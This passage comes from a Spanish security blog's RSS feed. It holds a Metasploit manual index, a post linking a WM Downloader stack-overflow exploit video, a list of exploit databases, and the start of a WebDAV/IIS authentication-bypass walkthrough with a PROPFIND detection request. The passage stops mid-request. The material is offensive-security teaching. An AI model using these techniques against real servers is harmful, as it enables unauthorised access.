title="Payloads a través de MSSQL (página no existe)" href="http://www.metasploit-es.com.ar/wiki/index.php?title=Payloads_a_trav%C3%A9s_de_MSSQL&amp;action=edit&amp;redlink=1">Payloads a través de MSSQL</a></li><li>14.2 <a
title="Creando Nuestro Modulo Auxiliar (página no existe)" href="http://www.metasploit-es.com.ar/wiki/index.php?title=Creando_Nuestro_Modulo_Auxiliar&amp;action=edit&amp;redlink=1">Creando Nuestro Modulo Auxiliar</a></li><li>14.3 <a
title="The Guts Behind It (página no existe)" href="http://www.metasploit-es.com.ar/wiki/index.php?title=The_Guts_Behind_It&amp;action=edit&amp;redlink=1">The Guts Behind It</a></li></ul></li><li>15 <a
title="Dona Aqui (página no existe)" href="http://www.metasploit-es.com.ar/wiki/index.php?title=Dona_Aqui&amp;action=edit&amp;redlink=1">Dona Aqui</a></li><li>16 <a
title="Glosario (página no existe)" href="http://www.metasploit-es.com.ar/wiki/index.php?title=Glosario&amp;action=edit&amp;redlink=1">Glosario</a><ul><li>16.1 <a
title="Modulos" href="http://www.metasploit-es.com.ar/wiki/index.php/Modulos">Modulos</a></li><li>16.2 <a
title="Recursos" href="http://www.metasploit-es.com.ar/wiki/index.php/Recursos">Recursos</a></li><li>16.3 <a
title="Un Poco sobre Payloads (página no existe)" href="http://www.metasploit-es.com.ar/wiki/index.php?title=Un_Poco_sobre_Payloads&amp;action=edit&amp;redlink=1">Un Poco sobre Payloads</a></li></ul></li><li>17 <a
title="FAQ" href="http://www.metasploit-es.com.ar/wiki/index.php/FAQ">FAQ</a></li><li>18 <a
title="Sobre los Autores" href="http://www.metasploit-es.com.ar/wiki/index.php/Sobre_los_Autores">Sobre los Autores</a></li></ul><h2>Guia de usuario de Metasploit Framework en Español</h2><ul><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Introducci.C3.B3n">1 Introducción</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Instalaci.C3.B3n">2 Instalación</a><ul><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Instalaci.C3.B3n_en_Unix">2.1 Instalación en Unix</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Instalaci.C3.B3n_en_Windows">2.2 Instalación en Windows</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Advertencias_Plataforma">2.3 Advertencias Plataforma</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Sistemas_operativos_compatibles">2.4 Sistemas operativos compatibles</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Actualizaci.C3.B3n_del_Framework">2.5 Actualización del Framework</a></li></ul></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#C.C3.B3mo_empezar">3 Cómo empezar</a><ul><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#La_interfaz_de_la_consola">3.1 La interfaz de la consola</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#La_interfaz_gr.C3.A1fica_de_usuario">3.2 La interfaz gráfica de usuario</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#La_interfaz_de_l.C3.ADnea_de_comandos">3.3 La interfaz de línea de comandos</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#La_interfaz_Web">3.4 La interfaz Web</a></li></ul></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#El_almac.C3.A9n_de_datos">4 El almacén de datos</a><ul><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Global_DataStore">4.1 Global DataStore</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#M.C3.B3dulo_DataStore">4.2 Módulo DataStore</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Guardado_DataStore">4.3 Guardado DataStore</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Eficiencia_del_DataStore">4.4 Eficiencia del DataStore</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Variables_DataStore">4.5 Variables DataStore</a><ul><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#LogLevel">4.5.1 LogLevel</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#MsfModulePaths">4.5.2 MsfModulePaths</a></li></ul></li></ul></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Utilizando_el_Framework">5 Utilizando el Framework</a><ul><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#La_elecci.C3.B3n_de_un_m.C3.B3dulo">5.1 La elección de un módulo</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#M.C3.B3dulos_de_Exploit">5.2 Módulos de Exploit</a><ul><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Configurando_el_Exploit_Activo">5.2.1 Configurando el Exploit Activo</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Comprobaci.C3.B3n_de_las_opciones_de_Exploit">5.2.2 Comprobación de las opciones de Exploit</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Selecci.C3.B3n_de_un_destino">5.2.3 Selección de un destino</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Selecci.C3.B3n_de_Payload">5.2.4 Selección de Payload</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Lanzamiento_del_exploit">5.2.5 Lanzamiento del exploit</a></li></ul></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#M.C3.B3dulos_auxiliares">5.3 Módulos auxiliares</a><ul><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#La_ejecuci.C3.B3n_de_una_tarea_auxiliar">5.3.1 La ejecución de una tarea auxiliar</a></li></ul></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#M.C3.B3dulos_de_payload">5.4 Módulos de payload</a><ul><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Generaci.C3.B3n_de_un_Payload">5.4.1 Generación de un Payload</a></li></ul></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Nop_M.C3.B3dulos">5.5 Nop Módulos</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Generaci.C3.B3n_de_un_trineo_NOP">5.6 Generación de un trineo NOP</a></li></ul></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Caracter.C3.ADsticas_avanzadas">6 Características avanzadas</a><ul><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#El_Meterpreter">6.1 El Meterpreter</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#PassiveX_Carga">6.2 PassiveX Carga</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Proxies_conexi.C3.B3n_en_cadena">6.3 Proxies conexión en cadena</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Win32_UploadExec_Carga">6.4 Win32 UploadExec Carga</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Win32_DLL_de_inyecci.C3.B3n_de_Carga">6.5 Win32 DLL de inyección de Carga</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#VNC_Server_DLL_Injection">6.6 VNC Server DLL Injection</a></li></ul></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#M.C3.A1s_Informaci.C3.B3n">7 Más Información</a><ul><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Sitio_Web">7.1 Sitio Web</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Lista_de_correo">7.2 Lista de correo</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Desarrolladores">7.3 Desarrolladores</a></li></ul></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#A._Seguridad">8 A. Seguridad</a><ul><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Interfaces_de_consola">8.1 Interfaces de consola</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Interfaz_Web">8.2 Interfaz Web</a></li></ul></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#B._Consejos_generales">9 B. Consejos generales</a><ul><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Tabulador">9.1 Tabulador</a></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#Secure_Socket_Layer">9.2 Secure Socket Layer</a></li></ul></li><li><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Guia_de_Usuario_de_Metasploit#C._Licencias">10 C. Licencias</a></li></ul><h2 style="text-align: center;"><a
href="http://www.metasploit-es.com.ar/wiki/index.php/Curso_de_Metasploit_Unleashed_en_Espa%C3%B1ol">Manual de Metasploit Framework en Español</a></h2><p><strong>Mas Información:</strong><br
/> <a
href="http://jhyx4life.blogspot.com/2009/11/metasploit-unleashed-en-espanol.html">Blog de Jhyx Traductor del Manual</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/video-tutoriales-de-metasploit-framework.xhtml" title="Video Tutoriales de Metasploit Framework">Video Tutoriales de Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/manual-en-espanol-de-meterpreter.xhtml" title="Manual en español de Meterpreter">Manual en español de Meterpreter</a></li><li><a
href="http://www.dragonjar.org/video-introduccion-al-metasploit-framework-2.xhtml" title="Vídeo: Introducción al Metasploit Framework">Vídeo: Introducción al Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/manual-de-metasploit-framework.xhtml" title="Curso Completo de Metasploit Framework">Curso Completo de Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/dominando-el-metasploit-framework.xhtml" title="Dominando el Metasploit Framework">Dominando el Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/dll-hijacking-con-metasploit.xhtml" title="DLL Hijacking con Metasploit">DLL Hijacking con Metasploit</a></li><li><a
href="http://www.dragonjar.org/video-tutorial-set-social-engineering-toolkit.xhtml" title="Video Tutorial SET (Social Engineering Toolkit)">Video Tutorial SET (Social Engineering Toolkit)</a></li><li><a
href="http://www.dragonjar.org/creando-un-exploit-paso-a-paso.xhtml" title="Creando un Exploit Paso a Paso">Creando un Exploit Paso a Paso</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/manual-de-metasploit-framework-en-espanol.xhtml/feed</wfw:commentRss> <slash:comments>20</slash:comments> </item> <item><title>Video: Explotando WM Downloader</title><link>http://www.dragonjar.org/video-explotando-wm-downloader.xhtml</link> <comments>http://www.dragonjar.org/video-explotando-wm-downloader.xhtml#comments</comments> <pubDate>Fri, 29 Jan 2010 19:07:26 +0000</pubDate> <dc:creator>Epsilon</dc:creator> <category><![CDATA[Artículos sobre seguridad]]></category> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Descargar]]></category> <category><![CDATA[Download]]></category> <category><![CDATA[Exploit]]></category> <category><![CDATA[Exploits]]></category> <category><![CDATA[MP3]]></category> <category><![CDATA[Podcast]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Video]]></category> <category><![CDATA[Vulnera]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[Windows]]></category> <category><![CDATA[WM Downloader]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3762</guid> <description><![CDATA[WM Downloader es un reproductor de Windows y un MP3 Stream Rippe/grabber (No graba directamente los sonidos desde el programa), el cual hace mas fácil descargar streaming de Windows y SHOUTcast Streams. Con este programa puedes descargar de manera muy sencilla todos tus podcast o videopodcast favoritos. Sin embargo WM Downloader en su versión  3.0.0.9 [...]]]></description> <content:encoded><![CDATA[<p
style="text-align: justify;"><a
href="http://www.dragonjar.org/tag/wm-downloader" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WM Downloader">WM Downloader</a> es un reproductor de <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> y un <a
href="http://www.dragonjar.org/tag/mp3" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con MP3">MP3</a> Stream Rippe/grabber (No graba directamente los sonidos desde el programa), el cual hace mas fácil <a
href="http://www.dragonjar.org/tag/descargar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Descargar">descargar</a> streaming de <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> y SHOUTcast Streams.  Con este programa puedes descargar de manera muy sencilla todos tus <a
href="http://www.dragonjar.org/tag/podcast" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Podcast">podcast</a> o videopodcast favoritos.</p><p
style="text-align: center;"><img
class="alignnone" src="http://www.mini-stream.net/res/images/wmdownloader/screenshot.gif" alt="screenshot Video: Explotando WM Downloader "  title="Video: Explotando WM Downloader " /></p><p
style="text-align: justify;">Sin embargo WM Downloader en su versión  3.0.0.9 presenta algunos fallos de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> considerables, así lo demuestra DouBle Zer0 Zer0, en un vídeo donde nos  muestra como se puede explotar una vulnerabilidad de tipo &#8220;stack overflow&#8221; creando archivos m3u corruptos. A continuación el vídeo,  y el <a
href="http://www.dragonjar.org/tag/exploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploit">exploit</a> lo pueden visualizar <a
href="http://www.milw0rm.com/exploits/8403">desde acá</a>.<span
id="more-3762"></span></p><p
style="text-align: center;"><object
classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="400" height="300" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="allowfullscreen" value="true" /><param
name="allowscriptaccess" value="always" /><param
name="src" value="http://vimeo.com/moogaloop.swf?clip_id=6431352&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed
type="application/x-shockwave-flash" width="400" height="300" src="http://vimeo.com/moogaloop.swf?clip_id=6431352&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p><p><strong>Mas Información:</strong><br
/> <a
href="http://www.milw0rm.com/exploits/8403">WM Downloader (.M3U File) Local Stack Overflow POC</a><br
/> <a
href="http://mini-stream.net/wm-downloader/">Pagina Oficial del WM Downloader</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/todos-los-videos-de-antichat-parte-i.xhtml" title="Todos los Vídeos de AntiChat &#8211; Parte I">Todos los Vídeos de AntiChat &#8211; Parte I</a></li><li><a
href="http://www.dragonjar.org/todos-los-videos-de-antichat-parte-ii.xhtml" title="Todos los Vídeos de AntiChat &#8211; Parte II">Todos los Vídeos de AntiChat &#8211; Parte II</a></li><li><a
href="http://www.dragonjar.org/winautopwn-ataques-automaticos-de-entornos-windows.xhtml" title="winAUTOPWN &#8211; Ataques automáticos de entornos Windows">winAUTOPWN &#8211; Ataques automáticos de entornos Windows</a></li><li><a
href="http://www.dragonjar.org/multiples-distribuciones-de-seguridad-en-tu-usb-con-katana.xhtml" title="Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB">Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a
href="http://www.dragonjar.org/ssdownloader-gestor-de-descargas-para-herramientas-de-seguridad.xhtml" title="SSDownloader &#8211; Gestor de descargas para Herramientas de Seguridad">SSDownloader &#8211; Gestor de descargas para Herramientas de Seguridad</a></li><li><a
href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a
href="http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml" title="Detección de WebDAV, verificación de la vulnerabilidad y explotación">Detección de WebDAV, verificación de la vulnerabilidad y explotación</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/video-explotando-wm-downloader.xhtml/feed</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>El reemplazo de Milw0rm</title><link>http://www.dragonjar.org/reemplazo-de-milw0rm.xhtml</link> <comments>http://www.dragonjar.org/reemplazo-de-milw0rm.xhtml#comments</comments> <pubDate>Thu, 19 Nov 2009 21:13:39 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[BackTrack]]></category> <category><![CDATA[Base de Datos]]></category> <category><![CDATA[Exploits]]></category> <category><![CDATA[Portal]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3348</guid> <description><![CDATA[Mucho se ha hablado últimamente sobre milw0rm.com , que str0ke (su autor) había muerto, lo cual fue desmentido luego gracias a twitter, que el sitio seria mantenido por otro grupo de personas (aunque desde septiembre no se actualiza) y en medio de las dudas sobre el futuro de este proyecto han salido varios candidatos que [...]]]></description> <content:encoded><![CDATA[<p>Mucho se ha hablado últimamente sobre milw0rm.com , que <a
href="http://twitter.com/Str0ke" target="_blank">str0ke</a> (su autor) había muerto, lo cual fue desmentido luego gracias a <a
href="http://twitter.com/str0ke/status/5422531377">twitter</a>, que el <a
href="http://twitter.com/str0ke/status/2534797494">sitio seria mantenido por otro grupo de personas</a> (aunque desde septiembre no se actualiza) y en medio de las dudas sobre el futuro de este proyecto han salido varios candidatos que pretenden servir de  reemplazo como por ejemplo inj3ct0r.com que es una copia exacta de milw0rm.com a modo de mirror para tener un backup del sitio en caso que deje de funcionar definitivamente (si lo hace).</p><p
style="text-align: center;"><img
class="alignnone" title="Alternativa a Milw0rm" src="http://img52.imageshack.us/img52/2278/exploita.png" alt="exploita El reemplazo de Milw0rm" width="553" height="118" /></p><p>En esta ocasión les voy a hablar del que a mi parecer será el sucesor de milw0rm y continuara con el legado dejado por str0ke, se trata de <a
href="http://www.exploit-db.com/" target="_blank">explo.it</a> un <a
href="http://www.dragonjar.org/tag/portal" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Portal">portal</a> que pretende ser una <a
href="http://www.dragonjar.org/tag/base-de-datos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Base de Datos">base de datos</a> de <a
href="http://www.dragonjar.org/tag/exploits" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploits">exploits</a> como lo era milw0rm pero con algunos beneficios que listare a continuación:<span
id="more-3348"></span></p><ol><li>Es mantenido por los desarrolladores de <a
href="http://www.offensive-security.com/" target="_blank">Ofensive Security</a>, quienes nos han regalado ya alegrías como el famoso <a
href="http://www.dragonjar.org/tag/backtrack" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con BackTrack">BackTrack</a>.</li><li>El <a
href="http://www.exploit-db.com/search.php">sistema de búsqueda </a>ha sido mejorado.</li><li>Ahora es posible <a
href="http://www.dragonjar.org/tag/descargar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Descargar">descargar</a> la aplicación a la que afecta el <a
href="http://www.dragonjar.org/tag/exploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploit">exploit</a>, dando click en la letra [A], incentivando aun mas la investigación de los fallos explotados.</li></ol><p>Por estos motivos creo que explo.it es el nuevo Milw0rm y desde La Comunidad DragonJAR le damos todo el apoyo a este proyecto para que siga adelante, ¿conoces alguna otra alternativa? háznosla saber en los comentarios.</p><p><strong>ACTUALIZADO:</strong></p><p>Gracias al comentario de <strong>JiRuSoNu</strong> tenemos algunas otras alternativas</p><p><strong>Exploits DB</strong><br
/> <a
rel="nofollow" href="http://www.expbase.com/">http://www.expbase.com/</a><br
/> <a
rel="nofollow" href="http://www.securelist.com/en/advisories/">http://www.securelist.com/en/advisories/</a><br
/> <a
rel="nofollow" href="http://www.hack0wn.com/">http://www.hack0wn.com/</a><br
/> <a
rel="nofollow" href="http://securityreason.com/exploit_alert">http://securityreason.com/exploit_alert</a><br
/> <a
rel="nofollow" href="http://www.exploit-db.com/">http://www.exploit-db.com/</a><br
/> <a
rel="nofollow" href="http://nvd.nist.gov/">http://nvd.nist.gov/</a><br
/> <a
rel="nofollow" href="http://secunia.com/advisories/historic/">http://secunia.com/advisories/historic/</a><br
/> <a
rel="nofollow" href="http://www.securityhome.eu/">http://www.securityhome.eu/</a><br
/> <a
rel="nofollow" href="http://www.security-database.com/">http://www.security-database.com/</a><br
/> <a
rel="nofollow" href="http://siomalabs.com/v/index.php/category/vulnerabilities/">http://siomalabs.com/v/index.php/category/vulnerabilities/</a><br
/> <a
rel="nofollow" href="http://osvdb.org/">http://osvdb.org/</a><br
/> <a
rel="nofollow" href="http://ariko-security.com/index-7.html">http://ariko-security.com/index-7.html</a><br
/> <a
rel="nofollow" href="http://www.packetstormsecurity.org/">http://www.packetstormsecurity.org/</a><br
/> <a
rel="nofollow" href="http://www.nullbyte.org.il/">http://www.nullbyte.org.il/</a></p><p><strong>Buscadores de Exploits</strong><br
/> <a
rel="nofollow" href="http://sebug.net/">http://sebug.net/</a><br
/> <a
rel="nofollow" href="http://exploitsearch.com/">http://exploitsearch.com/</a></p><p>&nbsp;</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/manual-de-metasploit-framework.xhtml" title="Curso Completo de Metasploit Framework">Curso Completo de Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/backtrack-personalizado-para-la-comunidad-dragonjar.xhtml" title="BackTrack personalizado para La Comunidad DragonJAR">BackTrack personalizado para La Comunidad DragonJAR</a></li><li><a
href="http://www.dragonjar.org/curso-backtrack-5-en-espanol.xhtml" title="Backtrack 5 Tutorial / Curso en Español">Backtrack 5 Tutorial / Curso en Español</a></li><li><a
href="http://www.dragonjar.org/winautopwn-ataques-automaticos-de-entornos-windows.xhtml" title="winAUTOPWN &#8211; Ataques automáticos de entornos Windows">winAUTOPWN &#8211; Ataques automáticos de entornos Windows</a></li><li><a
href="http://www.dragonjar.org/asi-fue-el-hacking-day-en-bogota-pentesting-con-backtrack.xhtml" title="Así fue el Hacking Day en Bogotá &#8211; Pentesting con Backtrack">Así fue el Hacking Day en Bogotá &#8211; Pentesting con Backtrack</a></li><li><a
href="http://www.dragonjar.org/actualizar-backtrack-5-a-backtrack-5-r1-sin-reinstalar.xhtml" title="Actualizar BackTrack 5 a Backtrack 5 R1 sin reinstalar">Actualizar BackTrack 5 a Backtrack 5 R1 sin reinstalar</a></li><li><a
href="http://www.dragonjar.org/backtrack-5-r1.xhtml" title="BackTrack 5 R1">BackTrack 5 R1</a></li><li><a
href="http://www.dragonjar.org/nos-vemos-en-medellin.xhtml" title="Nos vemos en Medellin!!">Nos vemos en Medellin!!</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/reemplazo-de-milw0rm.xhtml/feed</wfw:commentRss> <slash:comments>5</slash:comments> </item> <item><title>Detección de WebDAV, verificación de la vulnerabilidad y explotación</title><link>http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml</link> <comments>http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml#comments</comments> <pubDate>Mon, 01 Jun 2009 21:13:48 +0000</pubDate> <dc:creator>Cortex</dc:creator> <category><![CDATA[Artículos sobre seguridad]]></category> <category><![CDATA[COMOs]]></category> <category><![CDATA[General]]></category> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Exploits]]></category> <category><![CDATA[IIS]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[WebDAV]]></category> <category><![CDATA[Windows]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=2419</guid> <description><![CDATA[En SkullSecurity han publicado un interesante artículo (creado por Andrew) en el que muestran como llevar a cabo el proceso de explotación de la tan renombrada vulnerabilidad de WebDAV en los servidores IIS 6.0/5.0 descubierta el mes pasado, la cual permite acceder a directorios protegidos con contraseña debido al mal filtrado que se hace del [...]]]></description> <content:encoded><![CDATA[<p>En <a
title="WebDAV Detection, Vulnerability Checking and Exploitation" href="http://www.skullsecurity.org/blog/?p=285">SkullSecurity</a> han publicado un interesante artículo (creado por <strong>Andrew</strong>) en el que muestran como llevar a cabo el proceso de explotación de la tan renombrada <a
title="Understanding Microsoft's KB971492 IIS5/IIS6 WebDAV Vulnerability" href="http://unixwiz.net/techtips/ms971492-webdav-vuln.html">vulnerabilidad de <strong>WebDAV</strong> en los servidores <strong>IIS 6.0/5.0</strong></a> descubierta el mes pasado, la cual permite acceder a directorios protegidos con contraseña debido al mal filtrado que se hace del caracter unicode <em> %c0%a. </em></p><p>El artículo se encuentra en Inglés pero he decidido realizar la <strong>traducción</strong> para que nuestro público hispano también pueda tener acceso a este buen contenido. Se hace uso de la <a
href="http://www.dragonjar.org/tag/herramienta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramienta">herramienta</a> <a
title="El Libro de Nmap" href="http://www.dragonjar.org/el-libro-de-nmap.xhtml"><strong>Nmap</strong></a> para detectar si el servidor es vulnerable y luego por medio de una versión de <a
title="cadaver WebDAV" href="http://www.webdav.org/cadaver/"><strong>cadaver</strong></a> parcheada se realiza la explotación.</p><p><span
id="more-2419"></span></p><h2>Detección de <a
href="http://www.dragonjar.org/tag/webdav" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WebDAV">WebDAV</a>, verificación de la <a
href="http://www.dragonjar.org/tag/vulnerabilidad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidad">vulnerabilidad</a> y explotación</h2><p>La primera cosa que deberías saber al jugar con esta vulnerabilidad es que el servidor <a
href="http://www.dragonjar.org/tag/iis" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con IIS">IIS</a> no es explotable sí el directorio raiz está protegido. También si el directorio raiz está protegido, no hay manera de determinar ni siquiera si <a
title="Detección de WebDAV, verificación de la vulnerabilidad y explotación" href="http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml">WebDAV</a> está activado. Siendo dicho eso, si el directorio raiz _no_ está protegido entonces es hora de divertirnos un poco.</p><h2>Detectando sí WebDAV está activado</h2><p><strong>Las pruebas han sido realizadas en:</strong></p><ul><li>IIS 6.0/<a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> 2003 Enterprise SP2</li><li>IIS 5.1/Windows XP Pro SP2</li><li>IIS 5.0/Windows 2000 SP4</li></ul><p>En IIS 6-.0, WebDAV está desactivado por defecto. En IIS 5.0 y 5.1, WebDAV está activado por defecto y se debe editar el registro para desactivarlo.</p><p>Mi método de detección simplista requiere de ejecutar una petición <strong>PROPFIND</strong> en el servidor. Básicamente es la misma petición PROPFIND usada en el script <em><strong>http-iis-webdav-vuln.nse</strong></em>:</p><p
style="padding-left: 30px;"><code>PROPFIND / HTTP/1.1<br
/> Host: xxx.xxx.xxx.xxx<br
/> Content-Type: application/xml<br
/> Content-Length: 298</code></p><p
style="padding-left: 30px;">&lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;utf-8&#8243;?&gt;<br
/> &lt;propfind xmlns=&#8221;DAV:&#8221;&gt;<br
/> &lt;prop&gt;<br
/> &lt;getcontentlength xmlns=&#8221;DAV:&#8221;/&gt;<br
/> &lt;getlastmodified xmlns=&#8221;DAV:&#8221;/&gt;<br
